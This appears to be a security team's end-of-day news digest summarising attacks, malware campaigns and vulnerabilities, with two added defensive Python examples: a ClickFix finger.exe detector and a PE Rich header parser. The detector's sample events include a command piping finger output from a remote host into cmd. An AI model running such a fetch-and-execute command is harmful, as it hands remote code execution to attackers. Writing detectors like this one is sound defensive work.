=====================
= End-of-Day report =
=====================

Timeframe: Friday 12-12-2025 18:00 − Monday 15-12-2025 18:30
Handler: Guenes Holler
Co-Handler: Felician Fuchs
=====================
= News =
=====================
∗∗∗ French Interior Ministry confirms cyberattack on email servers ∗∗∗
---------------------------------------------
The French Interior Minister confirmed on Friday that the country's Ministry of the Interior was breached in a cyberattack that compromised e-mail servers.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/france-interior-ministry-conf...

∗∗∗ Microsoft: Recent Windows updates break VPN access for WSL users ∗∗∗
---------------------------------------------
Microsoft says that recent Windows 11 security updates are causing VPN networking failures for enterprise users running Windows Subsystem for Linux.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/microsoft-recent-windows-upd...

∗∗∗ Flaw in Hacktivist Ransomware Lets Victims Decrypt Own Files ∗∗∗
---------------------------------------------
A new version of VolkLocker, wielded by the pro-Russia RaaS group CyberVolk, has some key enhancements but one fatal flaw.
---------------------------------------------
https://www.darkreading.com/threat-intelligence/flaw-hacktivist-ransomware-v...

∗∗∗ Cyberattack: hackers hit Ideal Versicherung with ransomware ∗∗∗
---------------------------------------------
The Ideal Gruppe, which specialises in retirement and long-term care insurance, is investigating a ransomware infection. Business operations are restricted.
---------------------------------------------
https://www.golem.de/news/cyberangriff-hacker-attackieren-ideal-versicherung...

∗∗∗ A look at an Android ITW DNG exploit ∗∗∗
---------------------------------------------
Between July 2024 and February 2025, six suspicious image files were uploaded to VirusTotal. Thanks to a lead from Meta, the samples came to the attention of Google Threat Intelligence Group. Investigation showed that they were DNG files targeting the Quram library, an image-parsing library specific to Samsung devices.
---------------------------------------------
https://googleprojectzero.blogspot.com/2025/12/a-look-at-android-itw-dng-exp...

∗∗∗ Frogblight threatens you with a court case: a new Android banker targets Turkish users ∗∗∗
---------------------------------------------
Kaspersky researchers have discovered a new Android banking Trojan targeting Turkish users and posing as an app for accessing court case files via an official government webpage. The malware is being actively developed and may become MaaS in the future.
---------------------------------------------
https://securelist.com/frogblight-banker/118440/

∗∗∗ ClickFix Attacks Still Using the Finger ∗∗∗
---------------------------------------------
Since as early as November 2025, the finger protocol has been used in ClickFix social engineering attacks. BleepingComputer posted a report of this activity on November 15th, and Didier Stevens posted a short follow-up in an ISC diary the next day.
---------------------------------------------
https://isc.sans.edu/diary/rss/32566

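The finger client is almost never used legitimately on Windows endpoints, which makes it an easy thing to hunt for in process-creation telemetry. The following is an added example, not code from the ISC diary or the BleepingComputer report: it runs a small classifier over constructed process-creation events and grades them by how closely they match the ClickFix pattern. The command shapes it looks for (finger user@host piped into cmd or powershell, or launched from the Run dialog and therefore parented by explorer.exe) are assumptions modelled on the public reporting, and the events, hosts and user names are made up here.

```python
"""Flag finger.exe used as a command-fetch primitive in process-creation telemetry.

Added example for this report; not code from the ISC diary. The command shapes
(finger user@host piped into cmd or powershell, launched from the Run dialog)
are assumptions modelled on the public ClickFix reporting; the events are constructed.
"""
import re

# finger [user]@[host], with or without the .exe suffix, anywhere in the command line.
FINGER_RE = re.compile(
    r"""(?:^|[\s"'])finger(?:\.exe)?\s+(?P<user>[^\s@"']+)@(?P<host>[^\s"'|]+)""",
    re.IGNORECASE,
)
# Output of finger handed straight to an interpreter: the fetched text is executed.
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:cmd|powershell|pwsh)(?:\.exe)?\b", re.IGNORECASE)

# ClickFix victims paste into Win+R (parent explorer.exe) or into a shell they opened.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}

# Constructed events: (parent image, image, command line). Not real telemetry.
SAMPLE_EVENTS = [
    ("explorer.exe", "cmd.exe", "cmd.exe /c finger o@203.0.113.10 | cmd"),
    ("cmd.exe", "finger.exe", "finger.exe o@203.0.113.10"),
    ("cmd.exe", "finger.exe", "finger.exe alice@unix-host.corp.example"),
    ("explorer.exe", "notepad.exe", "notepad.exe notes.txt"),
    ("svchost.exe", "WerFault.exe", "WerFault.exe -u -p 1234"),
]


def classify_event(event):
    """Return a finding dict for an event that invokes finger, else None."""
    parent, image, cmdline = event
    match = FINGER_RE.search(cmdline)
    if image.lower() != "finger.exe" and not match:
        return None
    host = match.group("host") if match else None
    if PIPE_TO_SHELL_RE.search(cmdline):
        severity, reason = "high", "finger output piped into a shell"
    elif parent.lower() in INTERACTIVE_PARENTS:
        severity, reason = "medium", "finger launched from an interactive parent"
    else:
        severity, reason = "low", "finger client invoked"
    return {"severity": severity, "reason": reason, "host": host, "cmdline": cmdline}


def detect_finger_abuse(events):
    """Run the classifier over a sequence of events and keep only the hits."""
    return [finding for finding in map(classify_event, events) if finding]


def finger_hosts(findings):
    """Remote finger servers seen, for blocking TCP/79 egress or pivoting in proxy logs."""
    return sorted({finding["host"] for finding in findings if finding["host"]})


if __name__ == "__main__":
    hits = detect_finger_abuse(SAMPLE_EVENTS)
    for hit in hits:
        print(hit["severity"], hit["reason"], "|", hit["cmdline"])
    print("finger servers:", finger_hosts(hits))
```

The "low" tier exists so that a scheduled or service-spawned finger.exe is still recorded; the interesting cases are the interactive ones, and the extracted hosts give the network team something concrete to block on TCP/79.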
∗∗∗ Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads ∗∗∗
---------------------------------------------
Cybersecurity researchers are calling attention to a new campaign that's leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT.
---------------------------------------------
https://thehackernews.com/2025/12/fake-osint-and-gpt-utility-github-repos.ht...

∗∗∗ Job seekers beware! Caution with job portals such as trabajo.org and bebee.com ∗∗∗
---------------------------------------------
Job portals such as trabajo.org or bebee.com advertise attractive job offers. In reality there are numerous indications that no jobs are to be had there and that personal data may even be harvested.
---------------------------------------------
https://www.watchlist-internet.at/news/arbeitssuchende-aufgepasst-warum-sie-...

∗∗∗ Exploitation of Critical Vulnerability in React Server Components (Updated December 12) ∗∗∗
---------------------------------------------
We discuss the CVSS 10.0-rated RCE vulnerability in the Flight protocol used by React Server Components. This is tracked as CVE-2025-55182.
---------------------------------------------
https://unit42.paloaltonetworks.com/cve-2025-55182-react-and-cve-2025-66478-...

∗∗∗ PureRAT Campaign Targets Job Seekers, Abuses Foxit PDF Reader for DLL Side-loading ∗∗∗
---------------------------------------------
Job seekers looking out for opportunities might instead find their personal devices compromised, as a PureRAT campaign propagated through email leverages Foxit PDF Reader for concealment and DLL side-loading for initial entry.
---------------------------------------------
https://www.trendmicro.com/en_us/research/25/l/valleyrat-campaign.html

∗∗∗ Fake Microsoft Teams and Google Meet Downloads Spread Oyster Backdoor ∗∗∗
---------------------------------------------
The Oyster backdoor (also known as Broomstick) is targeting the financial world, using malicious search ads for PuTTY, Teams, and Google Meet.
---------------------------------------------
https://hackread.com/fake-microsoft-teams-google-meet-download-oyster-backdo...

∗∗∗ 16TB of MongoDB Database Exposes 4.3 Billion Lead Gen Records ∗∗∗
---------------------------------------------
Cybersecurity researchers discovered an unsecured 16TB database exposing 4.3 billion professional records, including names, emails, and LinkedIn data. Learn what happened, why this massive data leak enables new scams, and how to protect your PII.
---------------------------------------------
https://hackread.com/mongodb-database-expose-lead-gen-records/

∗∗∗ GitHub Scanner for React2Shell (CVE-2025-55182) Turns Out to Be Malware ∗∗∗
---------------------------------------------
A GitHub repository posing as a vulnerability scanner for CVE-2025-55182, also referred to as "React2Shell," was exposed as malicious after spreading malware. The project, named React2shell-scanner, was hosted under the user niha0wa and has since been removed from the platform following community reports.
---------------------------------------------
https://hackread.com/github-scanner-react2shell-cve-2025-55182-malware/

∗∗∗ Patch Tuesday problem: Message Queuing disruptions in Windows 10, Server 2016 and 2019 ∗∗∗
---------------------------------------------
The December security updates disrupt Message Queuing in Windows 10, Server 2016 and 2019, resulting in error messages.
---------------------------------------------
https://heise.de/-11114815

∗∗∗ "Careless Whisper" side-channel attack affects WhatsApp and Signal ∗∗∗ --------------------------------------------- A tool for tracking over three billion WhatsApp and Signal users has been publicly released. Just by knowing the phone number, attackers can determine when users come home, when they are actively using the phone, when they go to sleep, or when they are offline. They can also drain batteries and data limits without the users noticing anything. --------------------------------------------- https://cybernews.com/security/whatsapp-signal-real-time-tracking-battery-dr...
∗∗∗ Rich Headers: leveraging this mysterious artifact of the PE format ∗∗∗
---------------------------------------------
We started our project with low expectations, thinking that there must be a reason the Rich Headers feature is overlooked and not widely utilized. Over time, we became more and more impressed with how much could be achieved by searching for feature clusters based on such a small part of an executable, and how powerful it can be when leveraged correctly.
---------------------------------------------
https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-header...

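The Rich header the paper mines is small enough to parse by hand: between the DOS stub and the PE signature sits a "DanS" marker, three padding dwords and a run of (compid, count) pairs, all XOR-masked with a key that follows the trailing "Rich" marker; compid packs a product ID in the high 16 bits and a build number in the low 16. The following is an added example, not code from the paper or from Virus Bulletin. It decodes the entries and recomputes the key as a tamper check, using the widely documented checksum algorithm (rotate-and-add over the DOS header and stub with e_lfanew skipped, then over the entries), which is an assumption about the format rather than something the paper supplies. The MZ buffer, product IDs, build numbers and counts it parses are constructed here and carry no meaning.

```python
"""Rich header parser and checksum check for PE files.

Added example for this report; not code from the VB paper. The checksum
recomputation follows the commonly documented algorithm and is an assumption
about the format, not something the paper supplies.
"""
import struct

DANS = 0x536E6144   # the bytes b"DanS" read as a little-endian dword
RICH = b"Rich"


def _rol32(value, shift):
    """Rotate a 32-bit value left by shift bits (shift taken modulo 32)."""
    shift &= 31
    value &= 0xFFFFFFFF
    return ((value << shift) | (value >> (32 - shift))) & 0xFFFFFFFF


def rich_checksum(dos_region, entries):
    """Recompute the Rich XOR key from the DOS header+stub and the (compid, count) pairs.

    Bytes 0x3C..0x3F (e_lfanew) are skipped: the linker fills that field in after
    computing the checksum, so it never contributes.
    """
    cksum = len(dos_region)                          # offset of the "DanS" marker
    for i, byte in enumerate(dos_region):
        if 0x3C <= i < 0x40:
            continue
        cksum = (cksum + _rol32(byte, i)) & 0xFFFFFFFF
    for comp_id, count in entries:
        cksum = (cksum + _rol32(comp_id, count)) & 0xFFFFFFFF
    return cksum


def build_rich_header(dos_region, entries):
    """Encode a Rich header the way a linker would; used here to construct the sample."""
    key = rich_checksum(dos_region, entries)
    words = [DANS ^ key, key, key, key]              # "DanS" plus three zero padding dwords, masked
    for comp_id, count in entries:
        words += [comp_id ^ key, count ^ key]
    return struct.pack("<%dI" % len(words), *words) + RICH + struct.pack("<I", key)


def parse_rich_header(data):
    """Return {"offset", "key", "checksum_ok", "entries"} or None when no Rich header is found."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew > len(data):
        return None
    # The Rich header sits between the DOS stub and the PE signature; the "Rich"
    # marker is followed by the XOR key.
    rich_pos = data.rfind(RICH, 0, e_lfanew)
    if rich_pos < 0 or rich_pos + 8 > len(data):
        return None
    key = struct.unpack_from("<I", data, rich_pos + 4)[0]
    # Walk backwards one dword at a time, unmasking, until "DanS" appears.
    pos = rich_pos - 4
    decoded = []
    while pos >= 0:
        word = struct.unpack_from("<I", data, pos)[0] ^ key
        if word == DANS:
            break
        decoded.append(word)
        pos -= 4
    else:
        return None                                  # ran off the front without finding DanS
    decoded.reverse()
    body = decoded[3:]                               # skip the three padding dwords
    if len(body) % 2:
        return None
    pairs = list(zip(body[0::2], body[1::2]))
    entries = [{"product_id": c >> 16, "build": c & 0xFFFF, "count": n} for c, n in pairs]
    return {
        "offset": pos,
        "key": key,
        "checksum_ok": rich_checksum(data[:pos], pairs) == key,
        "entries": entries,
    }


# --- constructed sample (not a real binary; product IDs, builds and counts are arbitrary) ---
SAMPLE_ENTRIES = [(0x0093 << 16 | 0x7809, 12), (0x009A << 16 | 0x7809, 3), (0x0101 << 16 | 0x9D1F, 1)]


def make_sample():
    """Build a minimal MZ buffer: DOS header, stub, Rich header, then the PE signature."""
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)
    stub = b"This program cannot be run in DOS mode.\r\n$"
    stub += b"\x00" * (-len(stub) % 8)               # keep the Rich header dword-aligned
    rich = build_rich_header(bytes(dos) + stub, SAMPLE_ENTRIES)
    struct.pack_into("<I", dos, 0x3C, len(dos) + len(stub) + len(rich))   # e_lfanew -> "PE\0\0"
    return bytes(dos) + stub + rich + b"PE\x00\x00"


def tampered_sample():
    """Same buffer with one DOS stub byte flipped: the stored key no longer recomputes."""
    data = bytearray(make_sample())
    data[0x41] ^= 0xFF
    return bytes(data)


if __name__ == "__main__":
    for sample in (make_sample(), tampered_sample()):
        info = parse_rich_header(sample)
        print("checksum_ok=%s entries=%s" % (info["checksum_ok"], info["entries"]))
```

A key that fails to recompute means either the Rich header was edited after linking or the file did not come out of a Microsoft linker at all; both are worth a second look before the compid clusters are used for attribution, since an attacker who copies another binary's Rich header rarely bothers to fix up the checksum.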
∗∗∗ Decompiling run-only AppleScripts ∗∗∗
---------------------------------------------
An introduction to run-only AppleScripts: we validate the tool against XCSSET samples with known source, explore anti-analysis and anti-sandbox behavior in older malware, show common obfuscation tricks used in the wild, and walk through the key internals that make the decompiler work.
---------------------------------------------
https://pberba.github.io/security/2025/12/14/decompiling-run-only-applescrip...

=====================
= Vulnerabilities =
=====================
∗∗∗ Zero-day vulnerabilities in WebKit: attacks on iPhone users observed ∗∗∗
---------------------------------------------
Two actively exploited vulnerabilities endanger Apple devices such as iPhones, iPads and Macs. Users should patch promptly.
---------------------------------------------
https://www.golem.de/news/zero-day-luecken-in-webkit-angriffe-auf-iphone-nut...

∗∗∗ No patch from Microsoft: zero-day vulnerability endangers all current Windows versions ∗∗∗
---------------------------------------------
Researchers warn of a zero-day vulnerability in Windows. It becomes really dangerous in combination with an already known vulnerability.
---------------------------------------------
https://www.golem.de/news/kein-patch-von-microsoft-zero-day-luecke-gefaehrde...

∗∗∗ FreePBX Patches Critical SQLi, File-Upload, and AUTHTYPE Bypass Flaws Enabling RCE ∗∗∗
---------------------------------------------
Multiple security vulnerabilities have been disclosed in the open-source private branch exchange (PBX) platform FreePBX, including a critical flaw that could result in an authentication bypass under certain configurations.
---------------------------------------------
https://thehackernews.com/2025/12/freepbx-authentication-bypass-exposed.html

∗∗∗ Researcher Uncovers 30+ Flaws in AI Coding Tools Enabling Data Theft and RCE Attacks ∗∗∗
---------------------------------------------
Over 30 security vulnerabilities have been disclosed in various artificial intelligence (AI)-powered Integrated Development Environments (IDEs) that combine prompt injection primitives with legitimate features to achieve data exfiltration and remote code execution.
---------------------------------------------
https://thehackernews.com/2025/12/researchers-uncover-30-flaws-in-ai.html

∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (firefox, grafana, kernel, libsoup3, mysql8.4, and wireshark), Debian (ruby-git, ruby-sidekiq, thunderbird, and vlc), Fedora (apptainer, chromium, firefox, golangci-lint, libpng, and xkbcomp), Mageia (golang), SUSE (binutils, chromium, firefox, gegl, go1.25, govulncheck-vulndb, hauler, kernel, keylime, libpng12, pgadmin4, postgresql16, python, python-Django, python-django, python3, python311, rhino, thunderbird, unbound, and xkbcomp), and Ubuntu (usbmuxd).
---------------------------------------------
https://lwn.net/Articles/1050523/

∗∗∗ Security updates 1.6.12 and 1.5.12 released ∗∗∗
---------------------------------------------
We just published security updates to the 1.6 and 1.5 LTS versions of Roundcube Webmail. Both contain fixes for two recently reported security vulnerabilities.
---------------------------------------------
https://roundcube.net/news/2025/12/13/security-updates-1.6.12-and-1.5.12

∗∗∗ React2Shell patch insufficient, attacks spreading ∗∗∗
---------------------------------------------
The updates meant to close a critical vulnerability in React servers are incomplete. More and more attackers are abusing the hole.
---------------------------------------------
https://www.heise.de/news/React2Shell-Patch-unzureichend-Angriffe-weiten-sic...

∗∗∗ Attackers can compromise PCs managed with TeamViewer DEX ∗∗∗
---------------------------------------------
Admins use TeamViewer DEX (Digital Employee Experience) to manage company computers. Attackers can now exploit several vulnerabilities to attack managed devices.
---------------------------------------------
https://heise.de/-11114835